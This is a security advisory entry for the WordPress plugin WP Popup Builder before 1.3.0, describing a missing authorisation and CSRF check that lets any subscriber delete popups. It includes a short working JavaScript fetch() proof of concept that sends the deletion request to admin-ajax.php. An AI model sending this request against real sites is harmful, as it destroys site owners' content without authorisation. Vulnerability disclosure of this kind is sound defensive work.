WordPress Plugin Vulnerabilities

WP Popup Builder < 1.3.0 - Subscriber+ Arbitrary Popup Deletion

Description

The plugin does not have authorisation and CSRF check in an AJAX action, allowing any authenticated users, such as subscribers to delete arbitrary Popup

Proof of Concept

fetch('/wordpress/wp-admin/admin-ajax.php?action=delete_popup', {
  method: 'POST',headers:{"content-type":"application/x-www-form-urlencoded"},
  body: "bid=1",
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Fixed in 1.3.0

References

Classification

Type
NO AUTHORISATION
CWE

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-09-05 (about 1 years ago)
Added
2022-09-05 (about 1 years ago)
Last Updated
2022-09-30 (about 1 years ago)

Other